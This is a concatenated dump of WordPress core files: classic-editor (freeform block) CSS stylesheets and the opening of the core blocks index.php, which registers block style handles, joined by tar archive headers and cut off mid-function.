  clear:both;
  margin-bottom:16px;
  position:relative;
  width:99.99%;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{
  background:#0000;
  display:block;
  max-width:100%;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{
  bottom:0;
  left:0;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{
  display:none;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{
  border:1px dashed #ddd;
  padding:10px;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{
  border:1px solid #ddd;
  margin:0;
  padding:1em 0;
  word-wrap:break-word;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{
  margin:0;
  text-align:center;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{
  border-color:#0000;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{
  display:block;
  font-size:32px;
  height:32px;
  margin:0 auto;
  width:32px;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{
  clear:both;
  content:"";
  display:table;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{
  outline:none;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery a{
  cursor:default;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery{
  line-height:1;
  margin:auto -6px;
  overflow-x:hidden;
  padding:6px 0;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{
  box-sizing:border-box;
  float:right;
  margin:0;
  padding:6px;
  text-align:center;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{
  margin:0;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{
  font-size:13px;
  margin:4px 0;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{
  width:100%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{
  width:50%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{
  width:33.3333333333%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{
  width:25%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{
  width:20%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{
  width:16.6666666667%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{
  width:14.2857142857%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{
  width:12.5%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{
  width:11.1111111111%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery img{
  border:none;
  height:auto;
  max-width:100%;
  padding:0;
}

div[data-type="core/freeform"]:before{
  border:1px solid #ddd;
  outline:1px solid #0000;
  transition:border-color .1s linear,box-shadow .1s linear;
}
@media (prefers-reduced-motion:reduce){
  div[data-type="core/freeform"]:before{
    transition-delay:0s;
    transition-duration:0s;
  }
}
div[data-type="core/freeform"].is-selected:before{
  border-color:#1e1e1e;
}
div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{
  margin-top:0;
  padding-top:0;
}
div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{
  clear:both;
  content:"";
  display:table;
}

.mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{
  color:#1e1e1e;
}
.mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{
  margin-left:0;
  margin-right:8px;
}
.mce-toolbar-grp .mce-btn i{
  font-style:normal;
}

.block-library-classic__toolbar{
  border:1px solid #ddd;
  border-bottom:none;
  border-radius:2px;
  display:none;
  margin:0 0 8px;
  padding:0;
  position:sticky;
  top:0;
  width:auto;
  z-index:31;
}
div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{
  border-color:#1e1e1e;
  display:block;
}
.block-library-classic__toolbar .mce-tinymce{
  box-shadow:none;
}
@media (min-width:600px){
  .block-library-classic__toolbar{
    padding:0;
  }
}
.block-library-classic__toolbar:empty{
  background:#f5f5f5;
  border-bottom:1px solid #e2e4e7;
  display:block;
}
.block-library-classic__toolbar:empty:before{
  color:#555d66;
  content:attr(data-placeholder);
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  line-height:37px;
  padding:14px;
}
.block-library-classic__toolbar div.mce-toolbar-grp{
  border-bottom:1px solid #1e1e1e;
}
.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{
  height:auto !important;
  width:100% !important;
}
.block-library-classic__toolbar .mce-container-body.mce-abs-layout{
  overflow:visible;
}
.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{
  position:static;
}
.block-library-classic__toolbar .mce-toolbar-grp>div{
  padding:1px 3px;
}
.block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){
  display:none;
}
.block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{
  display:block;
}

.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{
  height:50vh !important;
}
@media (min-width:960px){
  .block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){
    height:9999rem;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{
    height:100%;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{
    height:calc(100% - 52px);
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{
    display:flex;
    flex-direction:column;
    height:100%;
    min-width:50vw;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{
    display:flex;
    flex-direction:column;
    flex-grow:1;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{
    flex-grow:1;
    height:10px !important;
  }
}
.block-editor-freeform-modal__actions{
  margin-top:16px;
}freeform/editor-rtl.min.css000060400000023324151330427370011737 0ustar00.wp-block-freeform.block-library-rich-text__tinymce{height:auto}.wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{line-height:1.8}.wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{margin-right:0;padding-right:2.5em}.wp-block-freeform.block-library-rich-text__tinymce blockquote{border-right:4px solid #000;box-shadow:inset 0 0 0 0 #ddd;margin:0;padding-right:1em}.wp-block-freeform.block-library-rich-text__tinymce pre{color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:15px;white-space:pre-wrap}.wp-block-freeform.block-library-rich-text__tinymce>:first-child{margin-top:0}.wp-block-freeform.block-library-rich-text__tinymce>:last-child{margin-bottom:0}.wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce a{color:var(--wp-admin-theme-color)}.wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{background:#e5f5fa;border-radius:2px;box-shadow:0 0 0 1px #e5f5fa;margin:0 -2px;padding:0 2px}.wp-block-freeform.block-library-rich-text__tinymce code{background:#f0f0f0;border-radius:2px;color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:14px;padding:2px}.wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{background:#ddd}.wp-block-freeform.block-library-rich-text__tinymce .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-freeform.block-library-rich-text__tinymce .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-freeform.block-library-rich-text__tinymce .aligncenter{display:block;margin-left:auto;margin-right:auto}.wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC);background-position:50%;background-repeat:no-repeat;background-size:1900px 20px;cursor:default;display:block;height:20px;margin:15px auto;outline:0;width:96%}.wp-block-freeform.block-library-rich-text__tinymce img::selection{background-color:initial}.wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{-ms-user-select:element}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{margin:0;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{display:block}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{-webkit-user-drag:none}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{margin:0;padding-top:.5em}.wp-block-freeform.block-library-rich-text__tinymce .wpview{border:1px solid #0000;clear:both;margin-bottom:16px;position:relative;width:99.99%}.wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{background:#0000;display:block;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{display:none}.wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{border:1px dashed #ddd;padding:10px}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{border:1px solid #ddd;margin:0;padding:1em 0;word-wrap:break-word}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{margin:0;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{border-color:#0000}.wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{display:block;font-size:32px;height:32px;margin:0 auto;width:32px}.wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{clear:both;content:"";display:table}.wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce .gallery a{cursor:default}.wp-block-freeform.block-library-rich-text__tinymce .gallery{line-height:1;margin:auto -6px;overflow-x:hidden;padding:6px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{box-sizing:border-box;float:right;margin:0;padding:6px;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{margin:0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{font-size:13px;margin:4px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{width:100%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{width:50%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{width:33.3333333333%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{width:25%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{width:20%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{width:16.6666666667%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{width:14.2857142857%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{width:12.5%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{width:11.1111111111%}.wp-block-freeform.block-library-rich-text__tinymce .gallery img{border:none;height:auto;max-width:100%;padding:0}div[data-type="core/freeform"]:before{border:1px solid #ddd;outline:1px solid #0000;transition:border-color .1s linear,box-shadow .1s linear}@media (prefers-reduced-motion:reduce){div[data-type="core/freeform"]:before{transition-delay:0s;transition-duration:0s}}div[data-type="core/freeform"].is-selected:before{border-color:#1e1e1e}div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{margin-top:0;padding-top:0}div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{clear:both;content:"";display:table}.mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{color:#1e1e1e}.mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{margin-left:0;margin-right:8px}.mce-toolbar-grp .mce-btn i{font-style:normal}.block-library-classic__toolbar{border:1px solid #ddd;border-bottom:none;border-radius:2px;display:none;margin:0 0 8px;padding:0;position:sticky;top:0;width:auto;z-index:31}div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{border-color:#1e1e1e;display:block}.block-library-classic__toolbar .mce-tinymce{box-shadow:none}@media (min-width:600px){.block-library-classic__toolbar{padding:0}}.block-library-classic__toolbar:empty{background:#f5f5f5;border-bottom:1px solid #e2e4e7;display:block}.block-library-classic__toolbar:empty:before{color:#555d66;content:attr(data-placeholder);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:37px;padding:14px}.block-library-classic__toolbar div.mce-toolbar-grp{border-bottom:1px solid #1e1e1e}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{height:auto!important;width:100%!important}.block-library-classic__toolbar .mce-container-body.mce-abs-layout{overflow:visible}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{position:static}.block-library-classic__toolbar .mce-toolbar-grp>div{padding:1px 3px}.block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){display:none}.block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{display:block}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{height:50vh!important}@media (min-width:960px){.block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){height:9999rem}.block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{height:100%}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{height:calc(100% - 52px)}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{display:flex;flex-direction:column;height:100%;min-width:50vw}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{display:flex;flex-direction:column;flex-grow:1}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{flex-grow:1;height:10px!important}}.block-editor-freeform-modal__actions{margin-top:16px}freeform/editor.css000060400000025002151330427370010351 0ustar00.wp-block-freeform.block-library-rich-text__tinymce{
  height:auto;
}
.wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{
  line-height:1.8;
}
.wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{
  margin-left:0;
  padding-left:2.5em;
}
.wp-block-freeform.block-library-rich-text__tinymce blockquote{
  border-left:4px solid #000;
  box-shadow:inset 0 0 0 0 #ddd;
  margin:0;
  padding-left:1em;
}
.wp-block-freeform.block-library-rich-text__tinymce pre{
  color:#1e1e1e;
  font-family:Menlo,Consolas,monaco,monospace;
  font-size:15px;
  white-space:pre-wrap;
}
.wp-block-freeform.block-library-rich-text__tinymce>:first-child{
  margin-top:0;
}
.wp-block-freeform.block-library-rich-text__tinymce>:last-child{
  margin-bottom:0;
}
.wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{
  outline:none;
}
.wp-block-freeform.block-library-rich-text__tinymce a{
  color:var(--wp-admin-theme-color);
}
.wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{
  background:#e5f5fa;
  border-radius:2px;
  box-shadow:0 0 0 1px #e5f5fa;
  margin:0 -2px;
  padding:0 2px;
}
.wp-block-freeform.block-library-rich-text__tinymce code{
  background:#f0f0f0;
  border-radius:2px;
  color:#1e1e1e;
  font-family:Menlo,Consolas,monaco,monospace;
  font-size:14px;
  padding:2px;
}
.wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{
  background:#ddd;
}
.wp-block-freeform.block-library-rich-text__tinymce .alignright{
  float:right;
  margin:.5em 0 .5em 1em;
}
.wp-block-freeform.block-library-rich-text__tinymce .alignleft{
  float:left;
  margin:.5em 1em .5em 0;
}
.wp-block-freeform.block-library-rich-text__tinymce .aligncenter{
  display:block;
  margin-left:auto;
  margin-right:auto;
}
.wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{
  background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC);
  background-position:50%;
  background-repeat:no-repeat;
  background-size:1900px 20px;
  cursor:default;
  display:block;
  height:20px;
  margin:15px auto;
  outline:0;
  width:96%;
}
.wp-block-freeform.block-library-rich-text__tinymce img::selection{
  background-color:initial;
}
.wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{
  -ms-user-select:element;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{
  margin:0;
  max-width:100%;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{
  display:block;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{
  -webkit-user-drag:none;
}
.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{
  margin:0;
  padding-top:.5em;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview{
  border:1px solid #0000;
  clear:both;
  margin-bottom:16px;
  position:relative;
  width:99.99%;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{
  background:#0000;
  display:block;
  max-width:100%;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{
  bottom:0;
  left:0;
  position:absolute;
  right:0;
  top:0;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{
  display:none;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{
  border:1px dashed #ddd;
  padding:10px;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{
  border:1px solid #ddd;
  margin:0;
  padding:1em 0;
  word-wrap:break-word;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{
  margin:0;
  text-align:center;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{
  border-color:#0000;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{
  display:block;
  font-size:32px;
  height:32px;
  margin:0 auto;
  width:32px;
}
.wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{
  clear:both;
  content:"";
  display:table;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{
  outline:none;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery a{
  cursor:default;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery{
  line-height:1;
  margin:auto -6px;
  overflow-x:hidden;
  padding:6px 0;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{
  box-sizing:border-box;
  float:left;
  margin:0;
  padding:6px;
  text-align:center;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{
  margin:0;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{
  font-size:13px;
  margin:4px 0;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{
  width:100%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{
  width:50%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{
  width:33.3333333333%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{
  width:25%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{
  width:20%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{
  width:16.6666666667%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{
  width:14.2857142857%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{
  width:12.5%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{
  width:11.1111111111%;
}
.wp-block-freeform.block-library-rich-text__tinymce .gallery img{
  border:none;
  height:auto;
  max-width:100%;
  padding:0;
}

div[data-type="core/freeform"]:before{
  border:1px solid #ddd;
  outline:1px solid #0000;
  transition:border-color .1s linear,box-shadow .1s linear;
}
@media (prefers-reduced-motion:reduce){
  div[data-type="core/freeform"]:before{
    transition-delay:0s;
    transition-duration:0s;
  }
}
div[data-type="core/freeform"].is-selected:before{
  border-color:#1e1e1e;
}
div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{
  margin-top:0;
  padding-top:0;
}
div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{
  clear:both;
  content:"";
  display:table;
}

.mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{
  color:#1e1e1e;
}
.mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{
  margin-left:8px;
  margin-right:0;
}
.mce-toolbar-grp .mce-btn i{
  font-style:normal;
}

.block-library-classic__toolbar{
  border:1px solid #ddd;
  border-bottom:none;
  border-radius:2px;
  display:none;
  margin:0 0 8px;
  padding:0;
  position:sticky;
  top:0;
  width:auto;
  z-index:31;
}
div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{
  border-color:#1e1e1e;
  display:block;
}
.block-library-classic__toolbar .mce-tinymce{
  box-shadow:none;
}
@media (min-width:600px){
  .block-library-classic__toolbar{
    padding:0;
  }
}
.block-library-classic__toolbar:empty{
  background:#f5f5f5;
  border-bottom:1px solid #e2e4e7;
  display:block;
}
.block-library-classic__toolbar:empty:before{
  color:#555d66;
  content:attr(data-placeholder);
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  line-height:37px;
  padding:14px;
}
.block-library-classic__toolbar div.mce-toolbar-grp{
  border-bottom:1px solid #1e1e1e;
}
.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{
  height:auto !important;
  width:100% !important;
}
.block-library-classic__toolbar .mce-container-body.mce-abs-layout{
  overflow:visible;
}
.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{
  position:static;
}
.block-library-classic__toolbar .mce-toolbar-grp>div{
  padding:1px 3px;
}
.block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){
  display:none;
}
.block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{
  display:block;
}

.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{
  height:50vh !important;
}
@media (min-width:960px){
  .block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){
    height:9999rem;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{
    height:100%;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{
    height:calc(100% - 52px);
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{
    display:flex;
    flex-direction:column;
    height:100%;
    min-width:50vw;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{
    display:flex;
    flex-direction:column;
    flex-grow:1;
  }
  .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{
    flex-grow:1;
    height:10px !important;
  }
}
.block-editor-freeform-modal__actions{
  margin-top:16px;
}index.php000060400000010751151330427370006371 0ustar00<?php
/**
 * Used to set up all core blocks used with the block editor.
 *
 * @package WordPress
 */

define( 'BLOCKS_PATH', ABSPATH . WPINC . '/blocks/' );

// Include files required for core blocks registration.
require BLOCKS_PATH . 'legacy-widget.php';
require BLOCKS_PATH . 'widget-group.php';
require BLOCKS_PATH . 'require-dynamic-blocks.php';

/**
 * Registers core block style handles.
 *
 * While {@see register_block_style_handle()} is typically used for that, the way it is
 * implemented is inefficient for core block styles. Registering those style handles here
 * avoids unnecessary logic and filesystem lookups in the other function.
 *
 * @since 6.3.0
 *
 * @global string $wp_version The WordPress version string.
 */
function register_core_block_style_handles() {
	global $wp_version;

	if ( ! wp_should_load_separate_core_block_assets() ) {
		return;
	}

	$blocks_url   = includes_url( 'blocks/' );
	$suffix       = wp_scripts_get_suffix();
	$wp_styles    = wp_styles();
	$style_fields = array(
		'style'       => 'style',
		'editorStyle' => 'editor',
	);

	static $core_blocks_meta;
	if ( ! $core_blocks_meta ) {
		$core_blocks_meta = require BLOCKS_PATH . 'blocks-json.php';
	}

	$files          = false;
	$transient_name = 'wp_core_block_css_files';

	/*
	 * Ignore transient cache when the development mode is set to 'core'. Why? To avoid interfering with
	 * the core developer's workflow.
	 */
	$can_use_cached = ! wp_is_development_mode( 'core' );

	if ( $can_use_cached ) {
		$cached_files = get_transient( $transient_name );

		// Check the validity of cached values by checking against the current WordPress version.
		if (
			is_array( $cached_files )
			&& isset( $cached_files['version'] )
			&& $cached_files['version'] === $wp_version
			&& isset( $cached_files['files'] )
		) {
			$files = $cached_files['files'];
		}
	}

	if ( ! $files ) {
		$files = glob( wp_normalize_path( BLOCKS_PATH . '**/**.css' ) );

		// Normalize BLOCKS_PATH prior to substitution for Windows environments.
		$normalized_blocks_path = wp_normalize_path( BLOCKS_PATH );

		$files = array_map(
			static function ( $file ) use ( $normalized_blocks_path ) {
				return str_replace( $normalized_blocks_path, '', $file );
			},
			$files
